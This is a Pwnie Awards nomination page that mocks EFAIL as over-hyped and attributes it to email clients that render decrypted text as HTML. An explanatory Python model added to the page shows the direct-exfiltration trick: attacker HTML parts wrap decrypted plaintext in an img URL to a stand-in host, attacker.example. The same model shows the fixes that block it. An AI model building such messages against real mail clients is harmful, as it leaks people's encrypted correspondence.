The 2018 Pwnie Nominee For Most Over-Hyped Bug

EFAIL

Credit: Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk

EFAIL was billed as a vulnerability in the end-to-end email encryption standards OpenPGP (and S/MIME) that leaked the plaintext of encrypted emails. The EFF came out and told people to disable or uninstall the tools that do PGP encrypted email. Encryption was a luxury of the past; call your lawyer, your spouse is reading your email. This was presented at USENIX, and had a website, a logo, a name, etc. Wired called it a "major, divisive flaw." Wired UK said PGP was dead. The Washington Post and USA Today joined in.

However, it turned out not to be a vulnerability in the cryptography, or even in GnuPG, but rather a problem with email clients: a client that decrypted a message and then rendered the result as HTML alongside attacker-supplied HTML could be tricked into shipping the plaintext off to the attacker's server. The GnuPG maintainers said it was overhyped. So in the end it didn't affect too many people, and after all the tool is called "Pretty Good Privacy". Is that like hacking a web application with a pretty good security assessment? Plus, Mutt wasn't even vulnerable.
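To make the "email client problem" concrete, here is an added model of EFAIL's direct-exfiltration channel (the variant that needs no cryptographic weakness at all). This is illustration code written for this page, not code from the Pwnie entry or from the EFAIL authors. It assumes a hypothetical attacker host (attacker.example) and replaces real OpenPGP/S-MIME decryption with a base64 stand-in so it runs offline; the point is what the client does with the decrypted bytes, not how they were decrypted.

```python
"""Model of EFAIL's 'direct exfiltration' channel against a mail client.

Added illustration, not code from the Pwnie page or the EFAIL paper.
Decryption is simulated: decrypt() is a stand-in for a PGP/S-MIME call.
"""
import base64
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

EXFIL_HOST = "attacker.example"  # hypothetical attacker-controlled host


def decrypt(ciphertext: bytes) -> str:
    # Stand-in for the real decryption step; returns what a legitimate
    # OpenPGP/S-MIME decryption would hand back to the client.
    return base64.b64decode(ciphertext).decode()


# Constructed sample: the attacker's multipart/mixed message. Part 2 is the
# stolen ciphertext the attacker cannot read; parts 1 and 3 are attacker-
# written HTML that wrap it in an unterminated <img src="..."> attribute.
SECRET = "Merger closes Friday. Wire the 20M to account 4711."
PARTS = [
    ("text/html", '<img src="http://%s/' % EXFIL_HOST),
    ("multipart/encrypted", base64.b64encode(SECRET.encode())),
    ("text/html", '">'),
]


class SrcCollector(HTMLParser):
    """Collects every URL the rendered document would try to fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)


def render_part(ctype, body):
    return decrypt(body) if ctype == "multipart/encrypted" else body


def vulnerable_client(parts):
    """Decrypts each part, then renders ALL parts as one HTML document.

    The decrypted plaintext lands inside the attribute opened by part 1 and
    closed by part 3, so the resulting <img> fetch carries it to the attacker.
    """
    document = "".join(render_part(c, b) for c, b in parts)
    parser = SrcCollector()
    parser.feed(document)
    return parser.urls


def hardened_client(parts):
    """Renders every MIME part as its own document and never auto-loads
    remote content. Decrypted text can no longer complete a tag that another
    part opened, and even a well-formed remote <img> would not be fetched."""
    urls = []
    for ctype, body in parts:
        parser = SrcCollector()
        parser.feed(render_part(ctype, body))
        urls.extend(u for u in parser.urls if not urlsplit(u).netloc)
    return urls


def leaked_plaintext(urls):
    """What the attacker's web server log would show for each fetched URL."""
    return [
        unquote(urlsplit(u).path.lstrip("/"))
        for u in urls
        if urlsplit(u).netloc == EXFIL_HOST
    ]


if __name__ == "__main__":
    print("vulnerable client fetches:", vulnerable_client(PARTS))
    print("attacker log shows:", leaked_plaintext(vulnerable_client(PARTS)))
    print("hardened client fetches:", hardened_client(PARTS))
```

The two fixes modelled in hardened_client are exactly the ones that mattered in practice: isolate each MIME part (and especially each decrypted part) as its own document, and do not load remote resources without the user asking. A client that did either was not exploitable via this channel, which is why the damage depended entirely on which mail client you used rather than on PGP itself.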

EFAIL (CVE-2017-17689)